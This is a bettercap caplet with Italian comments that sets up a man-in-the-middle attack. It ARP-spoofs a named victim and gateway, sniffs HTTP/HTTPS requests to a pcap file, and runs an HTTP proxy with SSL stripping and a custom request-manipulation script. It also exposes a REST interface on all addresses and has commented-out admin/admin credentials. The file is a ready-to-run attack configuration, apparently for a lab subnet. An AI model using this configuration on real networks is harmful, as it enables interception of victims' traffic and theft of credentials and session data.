# mitm-advanced.cap - Configurazione avanzata per attacco MITM

# ---- CONFIGURAZIONE SNIFFER ----
# Disabilita output verboso per ridurre il rumore
set net.sniff.verbose false

# Permetti lo sniffing del traffico locale
set net.sniff.local true

# Salva il traffico catturato in formato pcap
set net.sniff.output /root/logs/sniffed_traffic.pcap

# Filtra solo richieste HTTP/HTTPS
set net.sniff.regexp '^(GET|POST|PUT|DELETE|HEAD|OPTIONS)'

# Filtra pacchetti specifici
set net.sniff.filter tcp port 80 or tcp port 443

# ---- CONFIGURAZIONE ARP SPOOFING ----
# Abilita spoofing sulla rete locale
set arp.spoof.internal true

# Target specifico (la vittima)
set arp.spoof.targets 172.16.238.10
# Configuro manualmente il gateway
set arp.spoof.gateway 172.16.238.1

# Evita di spoofing l'attaccante stesso
set arp.spoof.whitelist 172.16.238.30

# Abilita modalità full-duplex per intercettare tutto il traffico
set arp.spoof.fullduplex true

# ---- CONFIGURAZIONE PROXY HTTP ----
# Imposta porta per il proxy
set http.proxy.port 8080

# Abilita SSL stripping
set http.proxy.sslstrip true

# Script personalizzato per manipolare le richieste
set http.proxy.script /root/proxy-script.js

# Filtra tipi di file da non intercettare
set http.proxy.blacklist .*\.jpg,.*\.jpeg,.*\.png,.*\.gif

# Filtra solo certi tipi di file
set http.proxy.whitelist .*\.php,.*\.html,.*\.js

# ---- CONFIGURAZIONE INTERFACCIA WEB ----
# Credenziali per accesso web
#set api.rest.username admin
#set api.rest.password admin

# Porta e indirizzo per interfaccia web
set api.rest.port 8081
set api.rest.address 0.0.0.0

# ---- CONFIGURAZIONE LOGGING ----
# Output file per gli eventi
set events.stream.output /root/logs/bettercap_events.log

# Cattura tutti gli eventi
set events.stream.filter *

# ---- AVVIO MODULI ----
# Avvia logging eventi
events.stream on

# Avvia sniffing
net.sniff on

# Avvia ARP spoofing
arp.spoof on

# Avvia proxy HTTP
http.proxy on

# Avvia interfaccia web
api.rest on